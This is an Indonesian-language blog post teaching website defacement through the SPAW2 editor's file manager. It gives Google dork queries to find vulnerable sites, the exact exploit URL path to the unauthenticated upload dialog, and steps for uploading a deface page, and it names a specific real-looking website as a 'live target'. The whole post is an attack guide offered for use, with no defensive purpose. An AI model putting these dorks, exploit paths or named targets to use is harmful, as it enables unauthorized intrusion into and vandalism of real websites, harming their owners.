1. Bahan-bahan :
- Script Deface ext .html dan .txt
- Internet
- Hp/PC
2. Dork
- inurl:Spaw2/dialogs/
- Inurl:spaw2/uploads/files \
- Index of:/Spaw2/uploads/files
3. Exploit :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
4. Langkah-langkah
- Pertama, kita dorking dulu gan.
- Kedua, kita pilih salah satu web dan tambahkan exploit dibelakang site/
Contoh :
Https://nimogans.tq/spaw2/upload/files
Lalu kita tambahkan exploitnya, menjadi
Https://nimogans.tq/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Kalo vuln muncul kek gambar diatas
- Ketiga, kita setting dulu. Samakan kek yg diatas (yang ditandai)
- Keempat kita upload scriptnya (kagak semua vuln upload html)
- Kelima, Kita tambahkan exploit
/spaw2/upload/files/namascript
Contoh :
- Selesai gan.
Live target
http://www.wholehealthamerica.com/spaw2/
tambahkan dulu exploitnya
Sekian dulu gan, kalo ada yang kurang ngerti comment aja :*
0 comments: